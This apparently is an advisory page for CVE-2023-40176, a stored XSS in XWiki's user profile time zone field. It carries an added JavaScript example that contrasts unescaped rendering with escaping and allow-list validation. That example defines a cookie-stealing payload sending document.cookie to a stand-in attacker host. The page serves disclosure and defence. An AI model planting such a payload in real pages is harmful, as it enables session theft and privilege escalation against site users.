CVE-2023-40176
SXSS in the user profile via the timezone displayer
In short
Any registered user can store a script payload in the time zone field of their own profile. The value is rendered without escaping, so the script runs in the browser of every user who views that profile, letting the attacker act as the victim, steal information, and escalate their privileges (up to programming rights on the wiki).
Technical detail
Stored XSS in the time zone user preference of XWiki Platform. The preference is chosen from a drop-down, but that restriction exists only in the browser: an authenticated user can submit an arbitrary value from the developer tools or by calling the profile save URL directly with the right query string. The stored value is then displayed unescaped, so the payload executes for any visitor of the malicious profile, allowing the attacker to steal information from the victim and to escalate their access rights, up to programming rights. Affected since 4.1M2; fixed in 14.10.5 and 15.1RC1.
Summary generated and translated by AI from the official description.
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any registered user can exploit a stored XSS through their user profile by setting the payload as the value of the time zone user preference. Even though the time zone is selected from a drop down (no free text value) it can still be set from JavaScript (using the browser developer tools) or by calling the save URL on the user profile with the right query string. Once the time zone is set it is displayed without escaping which means the payload gets executed for any user that visits the malicious user profile, allowing the attacker to steal information and even gain more access rights (escalation to programming rights). This issue is present since version 4.1M2 when the time zone user preference was introduced. The issue has been fixed in XWiki 14.10.5 and 15.1RC1.
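The description above names the two defects behind this bug: the drop-down is a client-side convenience rather than a validation step, and the stored value is written into the page without output encoding. The following is an added example, not XWiki code, that shows both fixes side by side: a server-side allow-list check at the save endpoint, and HTML escaping at render time. The save handler, its parameter names, the short time-zone list, the attacker.invalid host and the payload are all constructed for the example; XWiki's real save URL and template code are different.

```javascript
// Added example (not XWiki's code): why a drop-down is not a security
// control, and the two server-side fixes that close a stored XSS of the
// kind described in CVE-2023-40176.

// Allow-list of valid zone ids. A real deployment would take this from its
// time-zone library; a small constructed subset keeps the example offline.
const VALID_TIMEZONES = new Set([
  "UTC", "Europe/Paris", "America/New_York", "Asia/Tokyo",
]);

// Constructed payload of the kind the advisory describes: a value the
// drop-down never offers, but which can be submitted from the browser's
// developer tools or by calling the profile save URL directly.
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">';

// 1. Vulnerable rendering: the stored value is concatenated into markup.
function renderTimezoneVulnerable(tz) {
  return `<span class="timezone">${tz}</span>`;
}

// 2. Output encoding: escape the five characters that matter in HTML text
// and attribute context, then render.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}
function renderTimezoneEscaped(tz) {
  return `<span class="timezone">${escapeHtml(tz)}</span>`;
}

// 3. Input validation at the save endpoint: the server re-checks the value
// against the allow-list regardless of what the UI offered.
// Hypothetical handler; not XWiki's real save URL or parameter names.
function saveTimezonePreference(profile, submittedValue) {
  if (!VALID_TIMEZONES.has(submittedValue)) {
    return { ok: false, reason: "timezone not in allow-list", profile };
  }
  return { ok: true, profile: { ...profile, timezone: submittedValue } };
}

// Check used below: does the rendered HTML still carry an inline event
// handler attribute (on* = ...) inside a tag?
function containsEventHandler(html) {
  return /<[^>]*\son\w+\s*=/i.test(html);
}

// Runs the three paths against the constructed payload.
function demo() {
  const current = { name: "mallory", timezone: "UTC" };
  return {
    // unescaped render keeps the executable handler
    vulnerable: containsEventHandler(renderTimezoneVulnerable(PAYLOAD)),
    // escaped render turns it into inert text
    escaped: containsEventHandler(renderTimezoneEscaped(PAYLOAD)),
    // allow-list rejects the payload even though the UI was bypassed
    rejected: !saveTimezonePreference(current, PAYLOAD).ok,
    // a legitimate value from the list is still accepted
    accepted: saveTimezonePreference(current, "Europe/Paris").ok,
  };
}

console.log(JSON.stringify(demo()));
```

Run it with `node` and the result reports `vulnerable: true`, `escaped: false`, `rejected: true`, `accepted: true`. Either fix alone stops this particular payload, but they address different failures: the allow-list keeps bad data out of storage (and is what a forensic audit of existing profiles should check against), while escaping protects the page even when some other code path writes a non-list value.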
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Affected products
xwiki · xwiki-platform